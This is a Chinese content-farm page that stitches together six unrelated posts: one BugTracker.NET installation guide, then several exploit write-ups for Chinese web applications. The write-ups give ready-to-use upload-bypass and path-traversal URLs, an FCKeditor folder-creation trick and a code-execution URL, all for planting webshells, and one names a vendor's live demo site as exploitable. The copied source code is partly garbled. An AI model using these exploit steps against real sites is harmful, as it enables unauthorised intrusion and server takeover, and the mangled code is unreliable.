欢迎来到个人简历网!永久域名:gerenjianli.cn (个人简历全拼+cn)
当前位置:首页 > 范文大全 > 实用文>bug漏洞处理机制系统bugtracker漏洞预警

bug漏洞处理机制系统bugtracker漏洞预警

2022-12-19 08:14:44 收藏本文 下载本文

“粉色考拉”通过精心收集,向本站投稿了6篇bug漏洞处理机制系统bugtracker漏洞预警,下面是小编整理后的bug漏洞处理机制系统bugtracker漏洞预警,欢迎您阅读,希望对您有所帮助。

bug漏洞处理机制系统bugtracker漏洞预警

篇1:bug漏洞处理机制系统bugtracker漏洞预警

为公司配置了一个Bug跟踪系统,找到BugTracker.NET,读了一下,翻译了其中的配置方法,以后有研究心得再放上来分享。

有需要的朋友可以在下面的网址去下载sourceforge.net/project/showfiles.php?group_id=66812

BugTracker.NET的首页是ifdefined.com/bugtrackernet.html,开源软件。想研究源码的直接下回去研究就是了。

你需要安装IIS 和ASP.NET2.0。 同时 SQL Server也必须运行起来,SQL Express也可以

下面是主要的步骤

1.解压缩zip文件到一个目录

2. 创建一个IIS 虚拟目录并且指向刚才的文件夹。请查看下面的连接support.microsoft.com/kb/172138 了解如何创建IIS虚拟目录

3.编辑文件 Welcoming ,根据不同的节改变如下的设置

LogFileFolder 指向 日志文件夹

AbsoluteUrlPrefix 指向首页

4. 创建数据库,名字根据喜好而定。 如国你没有SQL Server Management Studio Express来创建数据库。你可以用BugTracker.NET 的

网页来替代这个工作。首先设置Web.config中的ConnectionString 指向master数据库,打开网站导向到首页。选择Setup Database Tables联接,然后点击Create Database按钮。

5. 修改web.config中的ConnectionString指向你新创建的数据

6. 打开浏览器导向到站点的虚拟目录,并且以用户admin(密码是admin)登陆(如果默认页面不是default.aspx,请在IIS中指定默认页)

系统会提示运行setup.sql,创建表格,你也可以在SQL 企业管理器中运行这个脚本,

7. 请认真读下面的警告

警告:如果你打算在公共服务器上使用BugTracking.NET作为您的Bug跟踪管理系统,当安装配置完成后,你还应该做下面的事:

1. 改变admin帐户的密码

2. 删除下面的文件:query.aspx install.aspx

现在,你可以开始通过点 add a bug 开始创建bug. 请花一些时间来阅读这篇文档,同时也请阅读web.config了解你能用BugTracker.NET能为你做什么。

如果你打算备份BugTracker.NET数据,备份下面的文件:

1. SQL Server数据库

2.Web.config中指定的UploadFolder.

3. 你的自定义配置文件

a) Web.config

b) btnet_service.exe.config

c) btnet_custom.css, btnet_edit_bug.css, btnet_search.css

参考文献:ifdefined.com/bugtrackernet.html

网盘下载:点击下载

其他下载:点击下载

篇2:毕业论文选题系统上传漏洞漏洞预警

漏洞出在fileload目录下的FileUpload.asp文件中,用的是无惧组建上传

看代码

01var fu = new FileUpload(“uploadForm”,“idFile”, { Limit: 3, ExtIn: [“rar”,“doc”,“xls”], RanName: true,

02onIniFile: function(file){ file.value ? file.style.display =“none” : this.Folder.removeChild(file); },

03onEmpty: function{ alert(“请选择一个文件”); },

04onLimite: function(){ alert(“超过上传限制”); },

05onSame: function(){ alert(“已经有相同文件”); },

06onNotExtIn: function(){ alert(“只允许上传” + this.ExtIn.join(“,”) +“文件”); },

07onFail: function(file){ this.Folder.removeChild(file); },

08onIni: function(){

09//显示文件列表

10var arrRows = [];

11if(this.Files.length){

12var This = this;

13Each(this.Files, function(o){

14var a = document.createElement(“a”); a.innerHTML =“取消”; a.href =“javascript.:void(0);”;

15a.onclick = function(){ oThis.Delete(o); return false; };

16arrRows.push([o.value, a]);

17});

18} else { arrRows.push([“没有添加文件”,“ ”]); }

19AddList(arrRows);

20//设置按钮

21$(“idBtnupload”).disabled = $(“idBtndel”).disabled = this.Files.length <= 0;

22}

23});

24

25$(“idBtnupload”).onclick = function(){

26//显示文件列表

27var arrRows = [];

28Each(fu.Files, function(o){ arrRows.push([o.value,“ ”]); });

29AddList(arrRows);

30

31fu.Folder.style.display =“none”;

32$(“idProcess”).style.display =“”;

33$(“idMsg”).innerHTML =“正在上传文件到服务器,请稍候……

有可能因为网络问题,出现程序长时间无响应,请点击“取消”重新上传文件”;

34

35fu.Form.submit();

36}

37

38//用来添加文件列表的函数

39function AddList(rows){

40//根据数组来添加列表

41var FileList = $(“idFileList”), Fragment = document.createDocumentFragment();

42//用文档碎片保存列表

43Each(rows, function(cells){

44var row = document.createElement(“tr”);

45Each(cells, function(o){

46var cell = document.createElement(“td”);

47if(typeof o ==“string”){ cell.innerHTML = o; }else{ cell.appendChild(o); }

48row.appendChild(cell);

49});

50oFragment.appendChild(row);

51})

52//ie的table不支持innerHTML所以这样清空table

53while(FileList.hasChildNodes()){ FileList.removeChild(FileList.firstChild); }

54FileList.appendChild(oFragment);

55}

56

57

58$(“idLimit”).innerHTML = fu.Limit;

59

60$(“idExt”).innerHTML = fu.ExtIn.join(“,”);

61

62$(“idBtndel”).onclick = function(){ fu.Clear(); }

63

64//在后台通过window.parent来访问主页面的函数

65function Finish(msg){ alert(msg); location.href = location.href; }

66

67

68注意:

69

·请选择【rar,doc,xls】格式的文件,其他格式的文件请打包后再上传,

毕业论文选题系统上传漏洞漏洞预警

70

·文件名尽量详细,以方便下载。

71

·文件不能过大。

72

73

没有将文件重命名,外加本地JS验证。配合IIS6.0解析漏洞 如果是IIS7 的话用火狐

漏洞利用方法:

访问www.xxx.com/fileload/FileUpload.asp  然后将ASP木马改为1.asp;.rar 或者asp;.xsl 也行 上传后的文件存在/fileload/file/下面

网站系统下载地址:down.admin5.com/asp/60831.html

篇3:opcms内容管理系统Oday漏洞预警

漏洞文件cp.php,文件存在代码执行漏洞,

opcms内容管理系统Oday漏洞预警

127.0.0.1/cp.php?opc=phpinfo()

后台获取shell方法在网站信息设置那里,点击email修改!

插入如下代码 ‘?>/*

篇4:ShopWind网店系统 v1.02 上传漏洞漏洞预警

老问题,这个程序用的是FCKeditor 编辑器,

利用的解析问题。直接说利用方法!

第一步:

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

第二步:

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

篇5:ShopWind网店系统 v1.02 上传漏洞漏洞预警

Author:Lan3a

老问题,这个程序用的是FCKeditor 编辑器,

利用2003的解析问题。直接说利用方法!

第一步:

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

第二步:

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

篇6:网趣网站管理系统上传漏洞漏洞预警

程序:网趣网站管理系统1.2.1 (包含动态版和静态版 均存在此漏洞)

下载:www.codepub.com/d/downpage.php?n=1&id=18716::1288173021

FROM:www.st999.cn/blog

DATA:2010/04/22

利用方法:/ku_edit/ComquUp.asp?nf=&ni=a&nr=ok&nt=../st999.asp;&nm=&nq=&lx=1

漏洞文件:Free_ComQu\Ku_edit\ComquUp.asp

源码 :

<%Response.Buffer=True

Server.ScriptTimeOut=9999999

On Error Resume Next%>

酷航文件上传系统V2

<%

response.Cookies(“ComquUp”)=“1”

'您可以把上面判断cookies的写入语句复制到您登录的地方,这样便是“只有登录后才能操作上传文件,”

if request.Cookies(“ComquUp”)=“1” then%>

<%

ComquDFormName=trim(request(“nf”))

ComquDInputName=trim(request(“ni”))

ComquDYNReName=trim(request(“nr”))

ComquDPath=trim(request(“nt”))

ComquDDM=trim(request(“nm”))

ComquDPathQ=trim(request(“nq”))

ComquDType=trim(request(“lx”))

if ComquDPath“” then:ComquSavePath=ComquDPath:else:ComquSavePath=“/Upfile/edit/”:end if

if ComquDPathQ“” then:ComquSavePathQ=ComquDPathQ:else:ComquSavePathQ=ComquSavePath:end if

ComquYNPath(ComquSavePath)

if ComquDType=“1” then

ComquFileNames=“jpg,gif,png,bmp”

ComquBigSize=1024000'单位B

elseif ComquDType=“2” then

ComquFileNames=“swf,flv”

ComquBigSize=10240000

elseif ComquDType=“3” then

ComquFileNames=“avi,wmv,asf,mov,mp3,wma”

ComquBigSize=102400000

elseif ComquDType=“4” then

ComquFileNames=“rm,ra,ram,rmvb”

ComquBigSize=102400000

elseif ComquDType=“5” then

ComquFileNames=“txt,rar,zip,doc,7z,ppt”

ComquBigSize=102400000

end if

ComquFileSize=Request.TotalBytes

If ComquFileSize>0 Then

if ComquFileSize

Set ComquUpStm=Server.CreateObject(“ADODB.Stream”)

ComquUpStm.Type=1

ComquUpStm.Open

ComquUpStm.Write Request.BinaryRead(ComquFileSize)

ComquUpStm.Position=0

ComquFormDataSize=ComquUpStm.Read

ComquCrlf=chrB(13)&chrB(10)

ComquFormStart=InStrB(ComquFormDataSize,ComquCrlf)

ComquFormEnd=InStrB(ComquFormStart+1,ComquFormDataSize,ComquCrlf)

Set ComquFormStm=Server.Createobject(“ADODB.Stream”)

ComquFormStm.Type=1

ComquFormStm.Open

ComquUpStm.Position=ComquFormStart + 1

ComquUpStm.CopyTo ComquFormStm,ComquFormEnd-ComquFormStart-3

ComquFormStm.Position=0

ComquFormStm.Type=2

ComquFormStm.CharSet=“GB2312”

ComquFormStmText=ComquFormStm.Readtext

ComquFormStm.Close

ComquUpFileNAll=Mid(ComquFormStmText,InstrRev(ComquFormStmText,“\”)+1,ComquFormEnd)

ComquUpFileCZM=mid(ComquUpFileNAll,InstrRev(ComquUpFileNAll,“.”))

If ComquCheckFileCZM(ComquUpFileNAll) Then

if ComquDDM“” then

ComquUpFileName=ComquDDM

else

if ComquDYNReName“ok” then:ComquUpFileName=ComquUpFileNAll:else:ComquUpFileName=Year(now)&right(“0”&Month(now),2)&right(“0”&Day(now),2)&right(“0”&Hour(now),2)&right(“0”&Minute(now),2)&right(“0”&Second(now),2)&right(replace(Request.ServerVariables(“REMOTE_ADDR”),“.”,“”),4)&ComquUpFileCZM:end if

end if

ComquSaveFile=Server.MapPath(ComquSavePath & ComquUpFileName)

k=Instrb(ComquFormDataSize,ComquCrlf&ComquCrlf)+4

l=Instrb(k+1,ComquFormDataSize,leftB(ComquFormDataSize,ComquFormStart-1))-k-2

ComquFormStm.Type=1

ComquFormStm.Open

ComquUpStm.Position=k-1

ComquUpStm.CopyTo ComquFormStm,l

ComquFormStm.SaveToFile ComquSaveFile,2

ComquSaveFileName=Mid(ComquSaveFile,InstrRev(ComquSaveFile,“\”)+1)

if ComquDFormName“” then:Response.write“”:else:Response.write“”:end if

Response.write“”&left(ComquSaveFileName,3)&“**”&ComquUpFileCZM&“ 上传成功! 重新上传

Else

Response.write“文件格式不正确! 重新上传文 件

End If

Set ComquFormStm=Nothing

UploadStream.Close

Set UploadStream=Nothing

Function ComquCheckFileCZM(FileName)

FileType=Split(ComquFileNames,“,”)

For i=0 To Ubound(FileType)

If LCase(Right(FileName,len(FileType(i))))=LCase(FileType(i)) then

ComquCheckFileCZM=True

Exit Function

Else

ComquCheckFileCZM=False

End if

Next

End Function

Function ComquYNPath(FolderName)

ComquFolderM=Server.Mappath(FolderName)

Set Fso=CreateObject(“Scripting.FileSystemObject”)

If Not Fso.FolderExists(ComquFolderM) Then

Fso.CreateFolder(ComquFolderM)

End If

Set Fso=Nothing

End Function

else

Response.Write“大小超过”&ComquBigSize&“B! 重新上传

end if

Else%>

<%End if

else:response.Write(“您无权上传操作!”):end if%>

嘿嘿,,,很明显的nt参数未过滤,可以构造路径,直接上传获得shell,

此程序的官方演示地址,也存在着这漏洞。

main.comqu.com/ku_edit/ComquUp.asp?nf=&ni=a&nr=ok&nt=../st999.asp;&nm=&nq=&lx=1

直接找个jpg的马儿上传,右键查看源码,获得名称../st999.asp;st999.asp;201104220019371540.jpg,实际上马儿的名称是st999.asp;201104220019371540.jpg,shell地址就是upload/2011/4/201104221740280470.jpg

这个是一句话,密码是st999,大家就不要轮J官方的演示站了,嘿嘿。。。

【bug漏洞处理机制系统bugtracker漏洞预警】相关文章:

1.毕业论文选题系统上传漏洞漏洞预警

2.Nginx 安全漏洞 (CVE4547)漏洞预警

3.CVE0497 漏洞利用学习笔记漏洞预警

4.网马解密初级篇漏洞预警

5.COCOON Counter统计程序漏洞总结漏洞预警

6.EFront 3.6.9 社区版多个漏洞漏洞预警

7.天下马ASP收信程序漏洞漏洞预警

8.稻草人企业站管理系统宽字节注入漏洞利用漏洞预警

9.DedeCMS会员中心书签管理SQL注射漏洞漏洞预警

10.马克斯CMS2.0beta (maxcms)SQL注入漏洞解析漏洞预警

下载word文档
《bug漏洞处理机制系统bugtracker漏洞预警.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度: 评级1星 评级2星 评级3星 评级4星 评级5星
点击下载文档

文档为doc格式

  • 返回顶部